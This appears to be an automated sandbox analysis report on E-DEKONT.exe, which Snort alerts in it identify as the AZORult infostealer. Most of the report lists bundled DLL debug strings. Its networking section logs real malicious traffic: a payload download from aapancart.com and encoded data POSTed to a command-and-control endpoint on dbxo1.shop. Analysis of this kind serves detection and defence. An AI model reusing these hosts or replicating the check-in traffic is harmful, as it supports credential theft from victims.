                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108895399238.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108884231351.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943979243.000000001E774000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908823587.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908941995.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944687963.000000001E79C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108892004613.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108891891978.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
                  Source: Binary string: vcruntime140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                  Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108909446480.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
                  Source: Binary string: msvcp140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108887027855.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108886923210.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939672315.000000001E714000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944495518.000000001E78C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108913399205.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_004065C5 FindFirstFileW,FindClose,1_2_004065C5
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405990
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00402862 FindFirstFileW,1_2_00402862

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2029468 ET TROJAN Win32/AZORult V3.3 Client Checkin M15 192.168.11.20:49852 -> 104.21.44.194:80
                  Source: TrafficSnort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 104.21.44.194:80 -> 192.168.11.20:49852
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aapancart.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31 11 8b 31 11 eb 46 16 8b 30 63 8b 30 6c 8b 30 63 eb 40 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@
                  Source: global trafficHTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 41815Cache-Control: no-cache
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: E-DEKONT.exe, 00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: HTTPS://LOGIN.LIVE.COM/
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108827106899.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
